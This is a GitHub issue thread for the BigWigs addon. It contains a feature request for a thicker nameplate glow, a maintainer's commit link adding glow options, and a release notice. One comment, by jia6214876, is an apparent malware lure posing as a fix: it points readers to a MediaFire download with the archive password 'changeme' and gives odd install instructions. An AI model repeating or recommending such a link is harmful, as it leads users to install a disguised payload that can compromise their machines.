### ISSUE TITLE
Feature Request: Nameplate Glow Size

### ISSUE THREAD

**Issue by WanderingFox** [BigWigsMods/BigWigs#1773]
## Describe the problem
When using the pixel border glow on the nameplate icons it can be hard to see when it is by default 1px wide. Weakauras etc default it to 2px which is much easier to see.

### Consider attaching a screenshot below to help describe your issue (Attach directly, do not link to other websites)
bigwigs version:
![image](https://github.com/user-attachments/assets/16768c29-7a22-4ceb-9ece-f87722475955)

weakauras version (what functionality I'm hoping bigwigs can replace):
![image](https://github.com/user-attachments/assets/8fc3e6d4-08ff-41e6-a4ff-2bf414673a53)

At a glance when these are in a giant pack it can be hard to pick out the glow when it's so thin.

### What version of BigWigs are you using? (Stating 'latest' is not useful)
355 obd9244

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Justw8** [comment]
Added all possible customizations for each glow with https://github.com/BigWigsMods/BigWigs/commit/145aa1bb875d78e39170c19006f726821b725ee6

**Comment by funkydude** [comment]
v356 now released
